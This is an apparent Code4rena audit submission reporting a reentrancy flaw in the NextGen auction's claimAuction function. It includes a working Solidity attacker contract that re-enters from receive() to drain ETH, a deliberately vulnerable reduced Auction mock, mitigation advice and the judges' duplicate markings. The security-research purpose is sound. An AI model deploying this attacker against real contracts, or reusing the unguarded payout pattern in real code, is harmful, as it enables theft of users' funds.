Platform: Code4rena
Start Date: 30/10/2023
Pot Size: $49,250 USDC
Total HM: 14
Participants: 243
Period: 14 days
Judge: 0xsomeone
Id: 302
League: ETH
Rank: 204/243
Findings: 1
Award: $0.00
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: smiling_heretic
Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie
0 USDC - $0.00
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/hardhat/smart-contracts/AuctionDemo.sol#L113 https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/hardhat/smart-contracts/AuctionDemo.sol#L116
Any address that claimAuction pays ETH to — owner(), which receives highestBid, or a non-winning bidder, who is refunded their bid — can be a contract with a receive() fallback. (The winner itself is not paid ETH by claimAuction; in the PoC below it receives nothing, so the re-entry points for a receive()-based attack are the owner payout and the refund path.) Once claimAuction is called by the winner or an admin, each low-level call hands control to that contract before any state is updated, so its fallback can re-enter claimAuction and collect the same payout again, repeatedly, until the Auction contract's balance is depleted.
I deployed a simple attacker contract in Remix against a reduced copy of the auction logic (below); the sequence is straightforward enough that a full test file adds little. Attack flow: the attacker bids via participiate(), is then outbid by an honest bidder, and when claimAuction(1) is executed the refund sent to the attacker triggers its receive(), which calls claimAuction(1) again. Because nothing marks the auction as claimed or the bid as refunded before the transfers, every re-entry pays the refund (and the owner payout) again until the contract holds less than 1 ether; since the return value of each call is ignored, payouts that fail once the balance is gone do not revert the outer frames.
// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

// Proof-of-concept attacker for the reentrancy in Auction.claimAuction below.
// It takes part in the auction as an ordinary bidder and, each time the
// auction refunds it, re-enters claimAuction(1) from receive().
contract Attacker {
    Auction public _auction;

    constructor(address auction_) {
        _auction = Auction(auction_);
    }

    // Re-entry point: the refund issued by Auction.claimAuction lands here.
    // While the auction still holds more than 1 ether, call claimAuction(1)
    // again; the mock never marks the bid as refunded, so the same refund is
    // paid on every nested call. The 1 ether floor ends the recursion.
    receive() external payable {
        if (address(_auction).balance > 1 ether) {
            _auction.claimAuction(1);
        }
    }

    // Drained ETH accumulates in this contract.
    function balanceOf() public view returns (uint256) {
        return address(this).balance;
    }

    // Place a bid on token 1 (the id is hard-coded in setAuctionInfo) with the ETH sent along.
    function participiate() external payable {
        _auction.setAuctionInfo{value: msg.value}();
    }
}

// Reduced stand-in for the audited auction used by the PoC. It keeps the
// claimAuction payout loop but drops the surrounding logic of the real
// contract (access control, auction-end / already-claimed checks, token
// transfer). NOTE(review): confirm against the linked AuctionDemo.sol which
// of those guards exist there before transferring conclusions from this mock.
contract Auction {
    address owner;

    constructor() {
        owner = msg.sender;
    }

    // auction Bidders
    struct auctionInfoStru {
        address bidder;
        uint256 bid;
        bool status; // true while the bid is active; never cleared anywhere in this mock
    }

    // mapping of collectionSecondaryAddresses struct
    // token id => every bid placed on it (setAuctionInfo only ever writes id 1)
    mapping (uint256 => auctionInfoStru[]) public auctionInfoData;

    // Record msg.sender's bid on token 1. It must exceed the current highest
    // active bid, so bids in auctionInfoData[1] are strictly increasing.
    function setAuctionInfo() external payable {
        require(msg.value > returnHighestBid(1));
        auctionInfoStru memory newBid = auctionInfoStru(msg.sender, msg.value, true);
        auctionInfoData[1].push(newBid);
    }

    // Highest active bid amount for _tokenid; 0 when there are no bids or the
    // entry found is inactive.
    function returnHighestBid(uint256 _tokenid) public view returns (uint256) {
        uint256 index;
        if (auctionInfoData[_tokenid].length > 0) {
            uint256 highBid = 0;
            for (uint256 i=0; i< auctionInfoData[_tokenid].length; i++) {
                if (auctionInfoData[_tokenid][i].bid > highBid && auctionInfoData[_tokenid][i].status == true) {
                    highBid = auctionInfoData[_tokenid][i].bid;
                    index = i;
                }
            }
            if (auctionInfoData[_tokenid][index].status == true) {
                return highBid;
            } else {
                return 0;
            }
        } else {
            return 0;
        }
    }

    // Bidder behind the highest active bid; reverts if that entry is inactive.
    // highBid is never updated inside this loop, so `index` settles on the
    // last active bid rather than the largest one; the two coincide here only
    // because setAuctionInfo forces bids to be strictly increasing.
    function returnHighestBidder(uint256 _tokenid) public view returns (address) {
        uint256 highBid = 0;
        uint256 index;
        for (uint256 i=0; i< auctionInfoData[_tokenid].length; i++) {
            if (auctionInfoData[_tokenid][i].bid > highBid && auctionInfoData[_tokenid][i].status == true) {
                index = i;
            }
        }
        if (auctionInfoData[_tokenid][index].status == true) {
            return auctionInfoData[_tokenid][index].bidder;
        } else {
            revert("No Active Bidder");
        }
    }

    // Settle token _tokenid: pay highestBid to owner for the winning entry and
    // refund every other active bidder. Vulnerable pattern under test:
    //  - both payouts are low-level calls to addresses the counterparties
    //    control, made before any state changes (no claimed flag, status is
    //    never set to false, no reentrancy guard), so a recipient that
    //    re-enters claimAuction restarts the whole payout loop;
    //  - `success` is never checked, so a failed transfer (e.g. once the
    //    balance is drained) does not revert the call that issued it.
    function claimAuction(uint256 _tokenid) public {
        uint256 highestBid = returnHighestBid(_tokenid);
        address highestBidder = returnHighestBidder(_tokenid);
        for (uint256 i=0; i< auctionInfoData[_tokenid].length; i ++) {
            if (auctionInfoData[_tokenid][i].bidder == highestBidder && auctionInfoData[_tokenid][i].bid == highestBid && auctionInfoData[_tokenid][i].status == true) {
                // winning entry: proceeds go to the owner, not the bidder
                (bool success, ) = payable(owner).call{value: highestBid}("");
            } else if (auctionInfoData[_tokenid][i].status == true) {
                // losing active entry: refund the bidder -> receive() re-entry point
                (bool success, ) = payable(auctionInfoData[_tokenid][i].bidder).call{value: auctionInfoData[_tokenid][i].bid}("");
            } else {}
        }
    }
}
Manual review, remix
Add the nonReentrant modifier (ReentrancyGuard from OpenZeppelin, Solady or Solmate) to claimAuction, and follow checks-effects-interactions: record that the auction has been claimed and mark each bid as settled (status = false) before making the external calls, so that even a re-entrant call cannot trigger a second payout. Consider also checking the return value of each call, or using a pull-payment pattern, so a failed transfer does not pass silently.
Reentrancy
#0 - c4-pre-sort
2023-11-20T14:16:01Z
141345 marked the issue as duplicate of #962
#1 - c4-judge
2023-12-04T21:40:14Z
alex-ppg marked the issue as duplicate of #1323
#2 - c4-judge
2023-12-08T18:18:02Z
alex-ppg marked the issue as partial-25